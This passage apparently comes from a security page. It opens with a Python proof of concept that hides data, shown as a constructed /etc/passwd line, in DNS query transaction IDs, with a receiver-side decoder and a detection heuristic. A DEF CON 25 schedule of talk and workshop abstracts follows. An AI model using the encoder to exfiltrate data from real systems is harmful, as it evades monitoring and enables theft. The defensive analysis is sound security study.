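    """Minimal DNS query: 12-byte header (ID, flags RD=1, QDCOUNT=1) + one A/IN question.
    For bing.com this is 26 bytes, the size tcpdump reports in the capture above."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_qname(name) + struct.pack("!HH", 1, 1)


def txid_of(packet):
    """The transaction ID is the first two bytes of the header."""
    return struct.unpack("!H", packet[:2])[0]


def payload_to_txids(data):
    """Two payload bytes per query; an odd tail is padded with 0x00."""
    if len(data) % 2:
        data += b"\x00"
    return [struct.unpack("!H", data[i:i + 2])[0] for i in range(0, len(data), 2)]


def txids_to_payload(txids):
    """Inverse of payload_to_txids (trailing padding removed; payloads that end in
    a genuine 0x00 would need an explicit length field)."""
    return b"".join(struct.pack("!H", t) for t in txids).rstrip(b"\x00")


def build_exfil_queries(payload):
    """Sender side: one cover query per 16-bit chunk, cycling through the cover domains."""
    queries = []
    for i, txid in enumerate(payload_to_txids(payload)):
        name = COVER_DOMAINS[i % len(COVER_DOMAINS)]
        queries.append((name, build_query(txid, name)))
    return queries


# Matches tcpdump's one-line summary of a query, e.g.
# "19:58:39.299534 IP 127.0.0.1.47467 > 127.0.0.1.53: 25964+ A? bing.com. (26)"
QUERY_RE = re.compile(
    r"IP (?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): "
    r"(?P<txid>\d+)\+ A\? (?P<qname>\S+)\. \(\d+\)")


def txids_from_tcpdump(lines, server_ip):
    """Receiver (or analyst) side: IDs of queries sent to the covert server, in order.
    Filtering on the destination skips the forwarded copies a local resolver emits."""
    ids = []
    for line in lines:
        m = QUERY_RE.search(line)
        if m and m.group("dst") == server_ip and m.group("dport") == "53":
            ids.append(int(m.group("txid")))
    return ids


def render_capture(payload, client="10.0.1.39", server="10.0.1.53"):
    """Constructed tcpdump-style lines for the sender's queries (no real capture)."""
    lines = []
    for i, (name, pkt) in enumerate(build_exfil_queries(payload)):
        lines.append("19:58:39.%06d IP %s.%d > %s.53: %d+ A? %s. (%d)"
                     % (i * 1000, client, 40000 + i, server, txid_of(pkt), name, len(pkt)))
    return lines


def looks_like_header_channel(txids, min_samples=8, threshold=0.5):
    """Detection heuristic (an assumption, not from the talk): a resolver draws IDs
    uniformly, so both ID bytes landing in printable ASCII happens about 14% of the
    time; text riding in the ID field pushes that fraction toward 1."""
    if len(txids) < min_samples:
        return False
    printable = sum(1 for t in txids
                    if all(0x20 <= b <= 0x7E for b in struct.pack("!H", t)))
    return printable / len(txids) >= threshold


if __name__ == "__main__":
    secret = b"root:x:0:0:root:/root:/bin/bash\n"  # constructed /etc/passwd line
    capture = render_capture(secret)
    ids = txids_from_tcpdump(capture, "10.0.1.53")
    print("\n".join(capture))
    print("recovered:", txids_to_payload(ids), "flagged:", looks_like_header_channel(ids))
```

The heuristic is deliberately the kind of thing subdomain counting misses: it never looks at the QNAME, only at whether the ID field behaves like a random 16-bit value. Binary payloads or an XOR mask on the sender side would defeat this particular check, so treat it as one signal among several rather than a detector on its own.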


PHW - Neopolitan BR IV - Promenade Level - Saturday - 18:15-19:30


Advanced Implant Detection with Bro and PacketSled

Aaron Eppert, Director of Engineering for PacketSled

With the release of DoublePulsar by the Shadow Brokers, malicious software ranging from EternalBlue and WannaCry to the more recent (Not)Petya cyberattacks has necessitated a deeper understanding of the SMB protocol found in virtually every network in the world. Given the extreme complexity of SMB, it is very easy for C&C activity to go undetected due to the sheer signal-to-noise ratio present in the protocol and the high volume of activity that it generates on a network without malicious activity being present. For this, PacketSled extended the SMB analyzer in Bro to facilitate the detection of what would generally be anomalous behavior of the protocol itself, bringing the noise floor down and allowing for the detection of anomalous activity.

What is Bro? Bro is a powerful network analysis framework that allows for customized development via an internal scripting language that allows the creation of highly powerful detections via metadata extraction events.

Aaron Eppert (Twitter: @aeppert) is the Director of Engineering and lead developer of PacketSled's core Sensor technology. Aaron has commits to the Bro Core project and resurrected the SMB Analyzer from the depths of a feature branch and has since extended it for the purposes of finding modern malware. Additionally, Aaron has two decades of experience reverse engineering network protocols and malware as well as developing low-level software in a range of languages. Aaron has developed and presented Bro-centric trainings to Fortune 500 companies and government organizations.



Demolabs - Table 1 - Saturday - 16:00-17:50


Advanced Spectrum Monitoring with ShinySDR

Michael Ossmann

Dominic Spill

Saturday from 1600-1750 at Table One

Audience: Wireless, Defense

We have developed open source tools to monitor the RF spectrum at a high level and then drill down to individual signals, supporting both reverse engineering and signals intelligence. By automatically combining the results with OSINT data from regulatory bodies around the world, we are able to build up a picture of devices transmitting in an environment.

http://greatscottgadgets.com/spectrummonitoring

Michael Ossmann
Michael Ossmann is a wireless security researcher who makes hardware for hackers. Best known for the open source HackRF, Ubertooth, and GreatFET projects, he founded Great Scott Gadgets in an effort to put exciting, new tools into the hands of innovative people.

Dominic Spill
Dominic Spill is senior security researcher for Great Scott Gadgets. The US government recently labelled him as "extraordinary." This has gone to his head.



Workshops - ( Sold Out ) - Octavius 7 - Friday - 14:30-18:30


Advanced Wireless Attacks Against Enterprise Networks

Friday, 14:30 to 18:30 in Octavius 7

Gabriel Ryan Security Consultant, Gotham Digital Science

This workshop will instruct attendees on how to carry out sophisticated wireless attacks against corporate infrastructure. Students will learn how to attack and gain access to WPA2-Enterprise networks, bypass network access controls, and explore how wireless can be leveraged as a powerful means of lateral movement through an Active Directory environment.

Topics of interest include:

- Wireless Reconnaissance and Target Identification Within A Red Team Environment
- Attacking and Gaining Entry to WPA2-EAP wireless networks
- SMB Relay Attacks and LLMNR/NBT-NS Poisoning
- Data Manipulation and Browser Exploitation Using Wireless MITM Attacks
- Downgrading Modern SSL/TLS Implementations Using Partial HSTS Bypasses
- Firewall and NAC Evasion Using Indirect Wireless Pivots

Each student will receive a course package containing a comprehensive course guide and preconfigured virtual machines. External wireless adapters and other wireless networking hardware will be provided by the instructor, and material learned in the lectures will be practiced within a realistic lab environment. The instructor will make himself available via email for questions and guidance in the weeks leading up to and following the workshop.

Prerequisites: A previous wireless security background is helpful but not required.

Materials: Students will be required to bring their own laptops capable of running virtualization software such as VMware or VirtualBox. Other than that, I plan on providing the necessary hardware to complete the workshop. Hardware that will be provided to students includes:

- 1 TP-Link WN722N external wireless interface per student
- wireless access points

Max students: 85 | Registration: https://dc25_ryan.eventbrite.com/ (Sold out!)

Gabriel Ryan
Gabriel Ryan is a security consultant and researcher with a passion for wireless and infrastructure testing. He currently works for Gotham Digital Science at their New York office, where he provides full scope red team penetration testing capabilities for a diverse range of clients. He also contributes heavily to his company's research division, GDS labs. Previously, Gabriel has worked as a penetration tester and researcher for the Virginia-based defense contractor OGSystems, and as a systems programmer for Rutgers University. He also is a member of the BSides Las Vegas senior staff, coordinating wireless security for the event. In his spare time, he enjoys live music, exploring the outdoors, and riding motorcycles.



CPV - Florentine Ballroom 4 - Friday - 12:00-13:00


Title:
Alice and Bob are Slightly Less Confused

Name:
David Huerta (Freedom of the Press Foundation)

Abstract:
Two years ago at DEF CON I discussed UX issues affecting every kind of encryption tool. Since then, much has improved. We'll go over some of the better examples of usable privacy technology and, like last time, go over some new challenges that still need to be addressed to make crypto usable in the real world. This talk is a sequel to this one: https://www.youtube.com/watch?v=pkh7gUm82QY.

Bio:
David Huerta is a Digital Security Fellow at the Freedom of the Press Foundation, where he's working on ways to train journalists to take advantage of privacy-enhancing technology to empower a free press. He's organized dozens of trainings across the US from Brooklyn to Phoenix. Before arriving in New York, he was one of the founding members for HeatSync Labs, an Arizona hackerspace which brings makers, hackers, and the occasional futurist together to build things and teach others how to do the same.
Twitter handle of presenter(s): huertanix


SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 16:00-16:59


Title:
All The Sales President's Men

1600 Friday
Patrick McNeil
@unregistered436

Are you someone technical who is starting to evaluate vendors for a new project? Or perhaps you are the person from your team tagged with going to Black Hat, RSA, or other vendor conferences to look at this year's product evaluation candidates?

As technologists and hackers many of us have skills in intelligence gathering, or social engineering, but we might not stop to think about how those same skills are being used against us to influence our purchasing decisions as we evaluate vendors for new projects. Now I know you're thinking, "I can spot that a mile away". No free lunch, vendor party, or booth giveaway at big security conference X is going to sway ME, right? Well, I've got a confession to make - it goes way beyond that stuff. As a sales engineer I can be your ally, your advocate, and an asset to your organization. I can also be the secret weapon of the sales team - the guy who speaks both languages - sales and tech. If I don't have good intentions I can convince you to buy something you don't need.

Want to know how? Let me walk you through what happens behind the scenes during the sales cycle at a typical tech company.


DEFCON - Track 4 - Saturday - 11:20-12:35


All Your Things Are Belong To Us

Saturday at 11:20 in Track 4

75 minutes | Demo, Exploit

Zenofex Hacker

0x00string Hacker

CJ_000 Hacker

Maximus64 Hacker

Get out your rollerblades, plug in your camo keyboard, and fire up your BLT drive. It's 25 years later and we're still hacking the planet. The Exploitee.rs are back with new 0day, new exploits and more fun. Celebrating a quarter century of DEF CON the best way we know how: hacking everything!

Our presentation will showcase vulnerabilities discovered during our research into thousands of dollars of IoT gear performed exclusively for DEF CON. We will be releasing all the vulnerabilities during the presentation as 0days to give attendees the ability to go home and unlock their hardware prior to patches being released. As always, to give back to the community that has given us so much, we will be handing out free hardware during the presentation so you can hack all the things too! Come party with us while we make "All Your Things Are Belong To Us."

Zenofex
Zenofex (@zenofex) is a researcher with Exploitee.rs. Amir founded "Exploitee.rs" which is a public research group and has released exploits for over 45 devices including the Amazon FireTV, Roku Media Player and the Google Chromecast. Amir is also a member of Austin Hackers and has spoken at a number of security conferences including DEF CON, B-Sides Austin, and InfoSec Southwest.

@exploiteers
@zenofex

0x00string
0x00string (@0x00string) is a hacker and security researcher, a recent addition to Exploitee.rs who has presented at BSidesSATX and ISSW. His previous published work includes Reverse Engineering The Kankun Smart Plug, and Hacking The Samsung Allshare Cast Hub. His hobbies include bug collecting and hacking all the things.

@0x00string

CJ_000
Cj_000 (@cj_000) is a researcher in the Cyber and Information Security directorate at *redacted* and also a member of Exploitee.rs. CJ has been involved in the release and responsible disclosure of vulnerabilities in a number of devices including TVs, media players, and refrigerators. CJ has presented at multiple DEF CONs and believes that a simple approach is often the most elegant solution.

@cj_000

Maximus64
Maximus64 (@maximus64_) is an undergraduate student at the University of Central Florida. Khoa enjoys a hardware based approach in researching embedded devices and is a master of the soldering iron. Khoa has disclosed numerous vulnerabilities in various set-top boxes and other "smart" devices to multiple vendors. He is currently listed on various "Security Hall of Fame" pages for successful bug bounty submissions including AT&T, Samsung and Roku.

@maximus64_



DEFCON - Track 1 - Thursday - 13:00-13:45


Amateur Digital Archeology

Thursday at 13:00 in 101 Track

45 minutes

Matt 'openfly' Joyce Hacker at NYC Resistor

'Digital Archeology' is actually the name of a Digital Forensics text book. But what if we used forensics techniques targeting cyber crime investigations to help address the void in Archeology that addresses digital media and silicon artifacts. At NYC Resistor in Brooklyn we've gotten into the world of Digital Archeology on several occasions and the projects have been enjoyable and educational.

Now, imagine what could happen if a bunch of hackers are able to get their hands on a laptop pulled off of a space shuttle.

Then come to our talk and find out what ACTUALLY happened. I bought a laptop at auction that claimed to be off a Shuttle Mission. It turns out to have been mostly authentic. This will be a little foray into the history of this device and what I could find out about it, and how I did that.

Spoiler Alert: We found out a lot.

Bonus: I may have found the sister laptop of this laptop (serial numbers match)

Matt 'openfly' Joyce
Matt Joyce hates writing in the third person. He is a hacker at NYC Resistor in Brooklyn. He used to do NASA shit for a project called Nebula. He currently is doing this talk in no way representing current or past employers. Matt's last talk was at the American Homebrewer's Association.



DEFCON - Track 3 - Friday - 16:00-16:45


An ACE Up the Sleeve: Designing Active Directory DACL Backdoors

Friday at 16:00 in Track 3

45 minutes | Demo

Andy Robbins Red Team Lead

Will Schroeder Offensive Engineer

Active Directory (AD) object discretionary access control lists (DACLs) are an untapped offensive landscape, often overlooked by attackers and defenders alike. The control relationships between AD objects align perfectly with the "attackers think in graphs" philosophy and expose an entire class of previously unseen control edges, dramatically expanding the number of paths to complete domain compromise.

While DACL misconfigurations can provide numerous paths that facilitate elevation of domain rights, they also present a unique chance to covertly deploy Active Directory persistence. It's often difficult to determine whether a specific AD DACL misconfiguration was set intentionally or implemented by accident. This makes Active Directory DACL backdoors an excellent persistence opportunity: minimal forensic footprint, and maximum plausible deniability.

This talk will cover Active Directory DACLs in depth, our "misconfiguration taxonomy", and enumeration/analysis with BloodHound's newly released feature set. We will cover the abuse of AD DACL misconfigurations for the purpose of domain rights elevation, including common misconfigurations encountered in the wild. We will then cover methods to design AD DACL backdoors, including ways to evade current detections, and will conclude with defensive mitigation/detection techniques for everything described.

Andy Robbins
As a Red Team lead, Andy Robbins has performed penetration tests and red team assessments for a number of Fortune 100 commercial clients, as well as federal and state agencies. Andy presented his research on a critical flaw in the ACH payment processing standard in 2014 at DerbyCon and the ISC2 World Congress, and has spoken at other conferences including DEF CON, BSidesLV, ekoparty, ISSA International, and Paranoia Conf in Oslo. He has a passion for offensive development and red team tradecraft, and helps to develop and teach the "Adaptive Red Team Tactics" course at BlackHat USA.

@_wald0

Will Schroeder
Will Schroeder is an offensive engineer and red teamer. He is a co-founder of Empire/Empyre, BloodHound, and the Veil-Framework, developed PowerView and PowerUp, is an active developer on the PowerSploit project, and is a Microsoft PowerShell MVP. He has presented at a number of conferences, including DEF CON, DerbyCon, Troopers, BlueHat Israel, and various Security BSides.

@harmj0y



PHW - Neopolitan BR IV - Promenade Level - Friday - 11:00-12:30


An Intro to Hunting with Splunk

Come to Packet Hacking Village and get a hands-on "Hunting with Splunk" training from the experts. You will learn how to deal with endpoint data, sort through wire data, and maybe even find some advanced threats. Then try your hand at searching for actors in a realistic dataset in Splunk.

Splunk Security Specialists (Twitter: @splunksec) are a group of Security practitioners who play with Splunk and get to help out at things like Wall of Sheep.



PHW - Neopolitan BR IV - Promenade Level - Sunday - 11:00-12:30


An Intro to Hunting with Splunk

Come to Packet Hacking Village and get a hands-on "Hunting with Splunk" training from the experts. You will learn how to deal with endpoint data, sort through wire data, and maybe even find some advanced threats. Then try your hand at searching for actors in a realistic dataset in Splunk.

Splunk Security Specialists (Twitter: @splunksec) are a group of Security practitioners who play with Splunk and get to help out at things like Wall of Sheep.



RCV - Palermo room, Promenade level - Friday - 14:55-15:40


An Introduction to Graph Theory for OSINT

Abstract

This session aims to gently introduce graph theory and the applied use of graphs for people who, like the speaker, consider themselves lacking the often perceived advanced math, science, and computer programming knowledge needed to harness their power.

The session will include live attendee interaction to help explain the general concepts of graph theory in a safe and inclusive way that should help solidify basic knowledge.

Once everyone understands what a graph can be used for we will discuss its applied use with several use cases including the tracking of security threats, construction of attacker profiles, and even using graphs to better understand organizational risk based on the introduction of new tools, processes, or legal requirements.

Attendees may not leave with a Ph.D. but they’ll certainly walk away with a firm understanding of graph theory and how to construct, deploy, and maintain graphs for security and compliance initiatives within their organization.

Speaker Profile



Demolabs - Table 3 - Saturday - 10:00-11:50


Android Tamer

Anant Shrivastava

Saturday from 1000-1150 at Table Three

Audience: Mobile (specifically Android)

Android Tamer is a project to provide various resources for Android mobile application and device security reviews, be it pentesting, malware analysis, reverse engineering or device assessment. We strive to solve some of the major pain points in setting up the testing environments by providing various ways and means to perform the task in the most effortless manner.

https://androidtamer.com/

Anant Shrivastava
Anant Shrivastava is an information security professional with nearly 10 years of hacking and teaching experience, with expertise in Mobile, Web Application, Networks and Linux Security. He is Regional Director Asia Pacific for NotSoSecure Global Services and has led hacking training at some of the world's top security conferences (BlackHat USA/EU/ASIA, Nullcon, g0s, c0c0n). Anant also leads the Open Source projects AndroidTamer (www.androidtamer.com) and CodeVigilant (www.codevigilant.com).



Workshops - ( Sold Out ) - Octavius 7 - Friday - 10:30-14:30


Applied Physical Attacks on Embedded Systems, Introductory Version

Friday, 10:30 to 14:30 in Octavius 7

Joe FitzPatrick Instructor & Researcher, Securing Hardware

Syler Clayton Security Engineer

Chris Castellano Senior Enterprise Windows Sysadmin

This workshop introduces several different relatively accessible interfaces on embedded systems. Attendees will get hands-on experience with UART, SPI, and JTAG interfaces on a MIPS-based wifi development board. After a brief architectural overview of each interface, hands-on labs will guide attendees through the process of understanding, observing, interacting with, and exploiting the interface to potentially access a root shell on the target.

Prerequisites: No hardware or electrical background is required. Computer architecture knowledge, Linux internals, command-line familiarity, and low-level programming experience are all very helpful but not actually required.

Materials: All equipment, including laptops, will be provided for use in the class. Students will be provided with a lab manual that includes an equipment list of all materials used for the class.

Max students: 60 | Registration: https://dc25_fitzpatrick.eventbrite.com (Sold out!)

Joe FitzPatrick
Joe (@securelyfitz) is an Instructor and Researcher at https://SecuringHardware.com (@securinghw). Joe has spent over a decade working on low-level silicon debug, security validation, and penetration testing of CPUs, SoCs, and microcontrollers. He has spent the past 5 years developing and leading hardware security related training, instructing hundreds of security researchers, pen testers, and hardware validators worldwide. When not teaching Applied Physical Attacks training, Joe is busy developing new course content or working on contributions to the NSA Playset and other misdirected hardware projects, which he regularly presents at all sorts of fun conferences.

Syler Clayton
Syler Clayton (@SylerClayton) is known in the homebrew scene for his work reverse engineering and developing exploits for the Nintendo 3DS and Wii U. Professionally, he has spent the past 5 years as a Security Engineer doing reverse engineering, exploit development, penetration testing & software development. Since 2015, Syler has led the Red Team for the Collegiate Cyber Defense Competition At-Large regional. In his free time, Syler enjoys hacking on embedded systems in the form of video games, racing drones, virtual reality & electric longboards.

Chris Castellano
Chris Castellano (@StealthyC) is a Senior Enterprise Windows Sysadmin, with a high focus in defensive security. Pew Pew.



SEV - Emperors BR II - Saturday - 16:55-17:25



Saturday July 29 4:55PM 30 Mins
To Be Announced Soon:

Michele Fincher: @SultryAsian
Michele Fincher is the Chief Influencing Agent of Social-Engineer, LLC, possessing over 20 years experience as a behavioral scientist, researcher, and information security professional. Her diverse background has helped solidify Social-Engineer, LLC’s place as the premier social engineering consulting firm.
As a US Air Force officer, Michele’s assignments included the USAF Academy, where she was a National Board Certified Counselor, Assistant Professor, and the Executive Officer in the Department of Behavioral Sciences and Leadership. Upon separating from the Air Force, Michele went on to hold positions with a research and software development firm in support of the US Air Force Research Laboratory as well as an information security firm, conducting National Security Agency appraisals and Certification and Accreditation for federal government information systems. She also returned to the USAF Academy, once again in the Department of Behavioral Sciences and Leadership, as a civilian instructor.
At Social-Engineer, LLC, Michele is a senior penetration tester and trainer with professional expertise in all facets of social engineering vectors, assessments, and research. A remarkable writer, she is also the talent behind many of the written products of Social-Engineer, LLC, including numerous reports and assessments, blog posts, and the Social-Engineer Newsletters. Michele is also the co-author of the very popular book, Phishing Dark Waters: The Offensive and Defensive Sides of Malicious Emails.
Michele is an often-requested trainer and speaker on various technical and behavioral subjects for law enforcement, the intelligence community, and the private sector in venues including the Black Hat Briefings, RSA, Techno Security, SC Congress, and the Advanced Practical Social Engineering training course.
Michele has her Bachelor of Science in Human Factors Engineering from the US Air Force Academy and her Master of Science in Counseling from Auburn University. She is a Certified Information Systems Security Professional (CISSP).



DEFCON - Track 1 - Friday - 15:00-15:45


Assembly Language is Too High Level

Friday at 15:00 in 101 Track

45 minutes | Demo, Tool, Exploit

XlogicX Machine Hacker

Do you have a collection of vulnerable programs that you have not yet been able to exploit? There may yet still be hope. This talk will show you how to look deeper (lower level). If you've ever heard experts say how x86 assembly language is just a one-to-one relationship to its machine-code, then we need to have a talk. This is that talk; gruesome detail on how an assembly instruction can have multiple valid representations in machine-code and vice versa. You can also just take my word for it, ignore the details like a bro, and use the tool that will be released for this talk: the Interactive Redundant Assembler (irasm). You can just copy the alternate machine code from the tool and use it in other tools like mona, use it to give yourself more options for self-modifying code, fork Hydan (stego) and give it more variety, or to create peace on earth.

XlogicX
XlogicX hacks at anything low level. He's unmasked sanitized IP addresses in packets (because checksums) and crafts his own pcaps with just xxd. He feeds complete garbage to forensic tools, AV products, decompression software, and intrusion detection systems. He made evil strings more evil (with automation) to exploit high consumption regular expressions. Lately he has been declaring war on assembly language (calling it too high-level) and doing all kinds of ignorant things with machine code. More information can be found on xlogicx.net

@XlogicX



RCV - Palermo room, Promenade level - Friday - 17:25-17:59


Attack Surface Discovery with Intrigue

Abstract

What’s more fun than discovering vulnerable and attack-worthy systems on the internet? Come join us for live demos!

Intrigue is a powerful and extensible open source engine for discovering attack surface. It helps security researchers, penetration testers, bug bounty hunters, and defenders to discover assets and their vulnerabilities. During this session, we’ll demo Intrigue and talk through architecture, with focus on recent areas of improvement such as meta-entities and discovery automation strategies.

Speaker Profile

Jonathan Cran (@jcran)



Workshops - ( Sold Out ) - Octavius 4 - Thursday - 10:30-14:30


Attacking Active Directory and Advanced Methods of Defense

Thursday, 10:30 to 14:30 in Octavius 4

Adam Steed Associate Director, Protiviti

Andrew Allen Senior Consultant, Protiviti

This hands-on workshop teaches you how to both attack and defend Active Directory. We will start by deploying an Active Directory environment using the typical security settings found in most medium to large organizations. Participants will then learn current common methods and tools used to exploit Active Directory against their test environments. Participants will create a hardened Active Directory environment using advanced methods to secure domain controllers from attack and then try to compromise their hardened environments.

Prerequisites: A basic to intermediate understanding of how Active Directory works including day to day administration of users and implementing group policy.

Materials: All participants will need to bring a laptop to the workshop that can be used to spin up virtual machines or have access to a personal AWS or Azure instance.

Max students: 72 | Registration: https://dc25_steed.eventbrite.com/ (Sold out!)

Adam Steed
Adam Steed prides himself in not just being an Information Security professional, but has been part of the culture that has defined Defcon for the last two decades. He has over 20 years of experience in working for Financial, Websites and Healthcare organizations. Currently Adam is an Associate Director at Protiviti as part of the Security and Privacy practice. He has also spoken at Bsides and other events across the United States.

Andrew Allen
Andrew Allen is a senior consultant in the IT Security and Privacy Management Practice at Protiviti. He served as an Information Assurance Security Officer in the United States Army before receiving a B.S. in Information Science and Technology from Temple University. His career has centered on penetration testing, and he is an offensive PowerShell enthusiast.



Workshops - ( Sold Out ) - Octavius 5 - Thursday - 14:30-18:30


Attacking and Defending 802.11ac Networks

Thursday, 14:30 to 18:30 in Octavius 5

Vivek Ramachandran Founder, Pentester Academy

Thomas d'Otreppe Wireless Security Researcher

802.11ac networks pose a significant challenge to existing Wi-Fi hacking tools and techniques. Unlike the previous generation of 802.11 networks, AC brings about significant complexities with features such as multi-user MIMO, advanced beamforming, up to 8 spatial streams, extremely high speeds (Gbps) and wide channel bandwidths (80-160 MHz). This workshop will help you "upgrade" your existing tools and techniques for both attacking and defending these networks. After this workshop, you will be able to create your own 802.11ac monitoring and attack platform.

Prerequisites: Working knowledge of Wi-Fi and Linux

Materials: We will be providing files which can be downloaded to follow the class. Wireshark needs to be installed.

Max students: 90 | Registration: https://dc25_ramachandran.eventbrite.com (Sold out!)

Vivek Ramachandran
Vivek Ramachandran is the Founder and Chief Trainer at Pentester Academy. He discovered the Caffe Latte attack, broke WEP Cloaking, conceptualized enterprise Wi-Fi Backdoors, created Chellam - the world's first Wi-Fi Firewall and Chigula - a Wi-Fi data mining and IDS framework. He is also the author of multiple five-star-rated books which have together sold over 13,000+ copies worldwide and have been translated to multiple languages. Vivek started "SecurityTube.net" in 2007, a YouTube for security which currently aggregates the largest collection of security research videos on the web. SecurityTube Training and Pentester Academy now serve thousands of customers from over 90 countries worldwide. Vivek's work on wireless security has been quoted in BBC online, InfoWorld, MacWorld, The Register, IT World Canada and other places. He has spoken/trained at top conferences around the world including Black Hat USA, Europe and Abu Dhabi, Defcon, Hacktivity, Brucon and others.

Thomas d'Otreppe
Thomas D'Otreppe is a wireless security researcher and author of Aircrack-ng, the most popular and complete suite of tools for WiFi network security assessments. He also created OpenWIPS-ng, an open source Wireless Intrusion Prevention System. Thomas is a contributor to the WiFi stack and toolset in Backtrack Linux, which has now become Kali Linux, the de facto top choice Linux distribution for penetration testing and vulnerability assessment across multiple technology domains. He is also known as an author of a pro-active wireless security course which has been delivered to large numbers of IT Security professionals worldwide. Thomas speaks and teaches in the Americas and Europe and is a well-known speaker at DefCon, BlackHat, DerbyCon, SharkFest, Mundo Hacker Day, BruCON and other venues.



DEFCON - Track 1 - Saturday - 14:00-14:45


Attacking Autonomic Networks

Saturday at 14:00 in 101 Track

45 minutes | Demo, Exploit

Omar Eissa Security Analyst, ERNW GmbH

Autonomic systems are smart systems which do not need any human management or intervention. Cisco is one of the first companies to deploy the technology in which the routers are just "Plug and Play" with no need for configuration. All that is needed is 5 commands to build a fully automated network. It is already supported in pretty much all of the recent software images for enterprise level and carrier grade routers/switches.

This is the bright side of the technology. On the other hand, the configuration is hidden and the interfaces are inaccessible. The protocol is proprietary and there is no mechanism to know what is running within your network.

In this talk, we will have a quick overview of Cisco's Autonomic Network Architecture, then I will reverse-engineer the proprietary protocol through its multiple phases. Finally, multiple vulnerabilities (overall 5) will be presented, one of which allows crashing systems remotely by knowing their IPv6 address.

Omar Eissa
Omar Eissa is a security analyst working for ERNW. His interests are network security and reverse-engineering. He is a professional Cisco engineer with various years of experience in enterprise and ISP networks. He has given talks and workshops at various telco events and conferences like Troopers17 and Black Hat USA 2017.



CHV - Village Talks Outside Contest Area, Pool Level - Friday - 10:00-10:59


Attacking Wireless Interfaces in Vehicles

No description available



CPV - Florentine Ballroom 4 - Saturday - 17:30-18:00


Title:
Automated Testing using Crypto Differential Fuzzing (DO NOT RECORD)

Author:
Yolan Romailler (Kudelski Security)

Abstract:
I present a new approach to test crypto software we developed together with JP Aumasson: differential fuzzing and our newly released tool, CDF, implementing it along with many edge case tests for common algorithms such as ECDSA, DSA and RSA. CDF also features time leakage detection.

CDF allowed the discovery of issues in high-profile, widely used crypto software components such as Go's crypto package, OpenSSL, and mbedTLS.

It is easy to use CDF to test your own library and everything is performed in a black-box fashion, so you only need to provide CDF with an executable to test it.

Bio:
Yolan Romailler is a Security Researcher at Kudelski Security, where he delves into (and dwells on) cryptography, crypto code, and other fun things. He graduated in mathematics at EPFL and later in information security at HES-SO, both in Switzerland.
Twitter handle of presenter(s): anomalroil


Wireless - Florentine BR I & II - Promenade Level - Friday - 11:30-11:55


Eric Escobar (JusticeBeaver)

Bio

Eric Escobar is a Principal Consultant at SecureWorks. His projects generally include a mixture of Raspberry Pis, 3D printing, wireless tech and maybe even a rocket or two. Before he started chasing shells, Eric procured a Bachelor's and Master's degree in Civil Engineering. He now enjoys all things wireless, from WiFi, to SDR and Ham Radio. His team consecutively won first place at DEF CON 23 and 24's Wireless CTF, snagging a black badge along the way.

Automating Physical Home Security through Hacking

Abstract

This presentation will dive into hacking wireless security systems present in many residential homes. A number of common wireless sensors are susceptible to a wide range of vulnerabilities including denial of service attacks, replay attacks and information disclosures. Sensors that detect motion, smoke, water leaks, gas leaks and open doors use similar weak communication protocols. Weaknesses in these sensors can present a juicy target to a tech savvy thief. With a Raspberry Pi and an Arduino, it's possible to exploit these weaknesses as well as create your own robust alarm system. With this system, you can customize text message alerts and detect a denial of service attack. This presentation will discuss how to exploit these vulnerabilities and how to use the same exploits to defend against the dark arts.



CHV - Village Talks Outside Contest Area, Pool Level - Friday - 12:00-12:59


Autosar SecOC – Secure On-Board Comms

No description available



PHV - Milano VIII - Promenade Level - Friday - 17:10-17:30


AWS Persistence and Lateral Movement Techniques

Peter Ewane, Security Researcher at AlienVault

The use of Amazon Cloud as a base of operations for businesses is increasing at a rapid rate. Everyone from 2-person start-ups to major companies has been migrating to the cloud. Because of this migration, cloud vendors have become the focus of potential exploitation and various role abuse in order to achieve persistence. This presentation will cover several different methods of post-infection and account persistence along with a discussion on best practices that can be used to protect from such techniques.

Peter Ewane (Twitter: @eaterofpumpkin) is a security researcher, sometimes conference speaker and a mostly blue teamer for the AlienVault Labs Team. When not playing with computers, Peter enjoys trying and making interesting cocktails and collecting whisk(e)y.



DEFCON - Track 2 - Sunday - 11:00-11:45


Backdooring the Lottery and Other Security Tales in Gaming over the Past 25 Years

Sunday at 11:00 in Track 2

45 minutes

Gus Fritschie CTO, SeNet International

Evan Teitelman Engineer, SeNet International

In this talk Gus and Evan will discuss the recent Hot Lotto fraud scandal and how one MUSL employee, Eddie Tipton, was able to rig several state lotteries and win $17 million (or perhaps more). Gus' firm is actively supporting the prosecution in this case. Evan was responsible for identifying and analyzing how Eddie was able to rig the RNG.

Details on the rigged RNG and other details from the case will be presented publicly for the first time during this talk.

For historical context other related attacks including the Ron Harris and hacking keno in the 1990's and a recent incident involving a Russian hacking syndicate's exploitation of slot machines will also be discussed.

Gus Fritschie
Gus Fritschie has been involved in information security since 2000. About 5 years ago (after his previous DEF CON presentation on iGaming security) he transitioned a significant portion of his practice into the gaming sector. Since then he has established himself and SeNet as the IT security leader in gaming. He has supported a number of clients across the gaming spectrum from iGaming operators, land-based casinos, gaming manufacturers, lotteries, tribal gaming, and daily fantasy sports. In his free time he is a recreational poker player (both online and B&M).

@gfritschie
@senetsecurity

Evan Teitelman
Bio coming soon.


Return to Index      -     

 

SEV - Emperors BR II - Friday - 16:55-17:25


Friday July 28 4:55PM 30 Mins

Beyond Phishing – Building and Sustaining a Corporate SE Program
Just think, 10 years ago, most organizations didn’t have an ethical hacking, red team or even a fully funded Infosec team. Now those teams are the “norm”, but what about a Social Engineering team? Is it possible to build an internal SE team and move past just phishing? I’ll speak to some of my experiences building and maintaining a SE team and moving past just “phishing”.

Fahey Owen: @fomanchu
Fahey Owens is an information security specialist with 20+ years of IT and 12 years of InfoSec experience. He spent several years as a system administrator and has held various roles in infosec such as vulnerability management and ethical hacking. He has many industry IT and Infosec certifications and spends his spare time honing his OSINT skills.


Return to Index      -     

 

BHV - Pisa Room - Saturday - 11:00-11:29


Title: Biohackers Die

Speaker: Jeffrey Tibbetts

About Jeffrey:
